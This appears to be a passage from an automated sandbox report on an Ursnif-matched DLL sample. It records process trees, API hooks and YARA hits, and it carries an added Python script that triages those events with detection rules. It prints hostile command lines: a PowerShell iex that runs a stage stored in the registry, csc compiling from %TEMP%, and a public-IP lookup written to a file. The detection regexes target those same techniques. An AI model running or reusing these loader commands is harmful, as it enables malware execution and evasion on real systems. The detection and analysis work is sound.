Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{5E9A7C9C-253E-40D9-9F72-297443C66DE8}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_01
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BA7B1CC8-D157-FCAE-2B8E-95F08FA29924}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{72D23258-290F-740E-43C6-6DE8275AF19C}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe | Mutant created: \Sessions\1\BaseNamedObjects\{82342662-F969-048B-93D6-3D78776AC12C}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{82DD54AC-F9FE-041C-93D6-3D78776AC12C}
Source: C:\Windows\System32\loaddll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{AEF8588D-35E8-10DC-2FC2-3944D3167DB8}
Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
Source: C:\Windows\explorer.exe | File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: data.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: data.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: data.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: data.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: data.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: data.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: data.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: data.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.889743890.0000000004B10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.910516903.0000000005CA0000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: data.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: data.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: data.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: data.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: data.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B2263 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B2210 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD7AB0 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00DD7E1F push ecx; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_04584EE0 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_045679B6 push ss; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0458528F push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BC4EE0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BA79B6 push ss; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BC528F push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A77AB0 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04A77E1F push ecx; ret
Source: C:\Windows\System32\control.exe | Code function: 34_2_0093B1B5 push 3B000001h; retf
Source: C:\Windows\System32\rundll32.exe | Code function: 45_2_000002D2D67DB1B5 push 3B000001h; retf
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_009679B6 push ss; ret
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_0098528F push ecx; ret
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 49_2_00984EE0 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: aixojixg.dll.20.dr | Static PE information: real checksum: 0x0 should be: 0xee27
Source: keehvxm3.dll.24.dr | Static PE information: real checksum: 0x0 should be: 0xeb64
Source: data.dll | Static PE information: real checksum: 0x75958 should be: 0x7619a
Source: a52acufz.dll.19.dr | Static PE information: real checksum: 0x0 should be: 0x2fa8
Source: ddwuzigh.dll.23.dr | Static PE information: real checksum: 0x0 should be: 0x5f5e
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
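The chain this report records in two places is the kind of parent/child telemetry a detection engineer would want to match: mshta.exe starting powershell.exe with an iex over a registry value under HKCU\Software\AppDataLow (the four entries at the top of this section), powershell.exe then driving csc.exe from a response file in %TEMP%, and, earlier in the report, explorer.exe running nslookup against myip.opendns.com and rundll32.exe loading data.dll from the Desktop. The Python below is an added example for this page, not Joe Sandbox code and not part of the sample: it rebuilds a handful of the report's process-creation entries as constructed records and runs rule functions of its own naming over them. The rule names, the list of user-writable directories and the check that control.exe is launched with -h are this example's own choices, not sandbox signatures.

```python
"""Process-tree triage for the parent/child chain listed in this report.

Added example for this page; not Joe Sandbox code and not part of the sample.
SAMPLE_EVENTS is constructed from the report's own "Process created" entries,
reduced to (parent image, child image, child command line). Rule names and
thresholds are this example's own choices.
"""
from __future__ import annotations

import re
from pathlib import PureWindowsPath

# Constructed from the report's process-creation entries; paths are kept as reported.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
     r"rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin"),
    (r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\System32\control.exe",
     r"C:\Windows\system32\control.exe -h"),
    (r"C:\Windows\System32\control.exe", r"C:\Windows\System32\rundll32.exe",
     r"'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h"),
    (r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
     r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),  # ordinary console host; should stay quiet
]

# iex over a value read back from HKCU\Software\AppDataLow: the loader keeps its PowerShell stage there.
IEX_FROM_REGISTRY = re.compile(
    r"\biex\b.*\b(?:gp|get-itemproperty)\b.*HKCU:\\?Software\\AppDataLow", re.IGNORECASE)
# csc.exe driven by a response file under %TEMP%: the compile step the report lists under Data Obfuscation.
CSC_RESPONSE_IN_TEMP = re.compile(r"csc\.exe.*@'[^']*\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Public-IP discovery through OpenDNS, here redirected into a file for later collection.
EXTERNAL_IP_LOOKUP = re.compile(r"\bnslookup\s+myip\.opendns\.com\b", re.IGNORECASE)
# rundll32 loading a DLL out of a user-writable location, by ordinal (#1) or export name.
USER_PATH_DLL = re.compile(
    r"rundll32\.exe\s+'?C:\\Users\\[^\\]+\\(?:Desktop|Downloads|AppData)\\[^,'\s]+\.dll'?,", re.IGNORECASE)
# The (key, value) the loader reads its next stage from: gp '<key>').<value>
REGISTRY_VALUE = re.compile(r"\b(?:gp|get-itemproperty)\s+'([^']+)'\s*\)\s*\.\s*(\w+)", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path (...\\mshta.exe -> mshta.exe)."""
    return PureWindowsPath(path).name.lower()


def classify(parent: str, child: str, cmdline: str) -> list[str]:
    """Return the names of the rules that fire for one process-creation event."""
    p, c = image_name(parent), image_name(child)
    tags = []
    if c == "powershell.exe" and p == "mshta.exe":
        tags.append("mshta_spawns_powershell")
    if c == "powershell.exe" and IEX_FROM_REGISTRY.search(cmdline):
        tags.append("iex_payload_from_registry")
    if c == "csc.exe" and p == "powershell.exe" and CSC_RESPONSE_IN_TEMP.search(cmdline):
        tags.append("powershell_compiles_csharp_in_temp")
    if c == "cmd.exe" and p == "explorer.exe" and EXTERNAL_IP_LOOKUP.search(cmdline):
        tags.append("explorer_runs_external_ip_lookup")
    if c == "rundll32.exe" and USER_PATH_DLL.search(cmdline):
        tags.append("rundll32_loads_user_path_dll")
    if c == "control.exe" and p in ("rundll32.exe", "loaddll32.exe") and cmdline.rstrip().endswith(" -h"):
        tags.append("dll_host_spawns_control_exe")
    return tags


def registry_stage(cmdline: str) -> tuple[str, str] | None:
    """(key, value name) the loader reads its next stage from, or None if the pattern is absent."""
    m = REGISTRY_VALUE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def triage(events) -> dict[str, list[tuple[str, str]]]:
    """Map each rule that fired to the (parent, child) image pairs that triggered it."""
    findings: dict[str, list[tuple[str, str]]] = {}
    for parent, child, cmdline in events:
        for tag in classify(parent, child, cmdline):
            findings.setdefault(tag, []).append((image_name(parent), image_name(child)))
    return findings


def stage_chain_present(findings) -> bool:
    """True when the host hand-off, the registry-resident stage and the compile step all appear."""
    needed = {"mshta_spawns_powershell", "iex_payload_from_registry", "powershell_compiles_csharp_in_temp"}
    return needed <= set(findings)


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for tag, pairs in hits.items():
        print(f"{tag}: {pairs}")
    print("full chain:", stage_chain_present(hits))
    print("stage location:", registry_stage(SAMPLE_EVENTS[3][2]))
```

registry_stage is the piece a responder acts on: it yields the exact key and value name to pull from the affected user's hive and decode with the same ASCII conversion the command line uses.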

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the import address table of user mode modules (user mode IAT hooks)
                      Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
                      Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
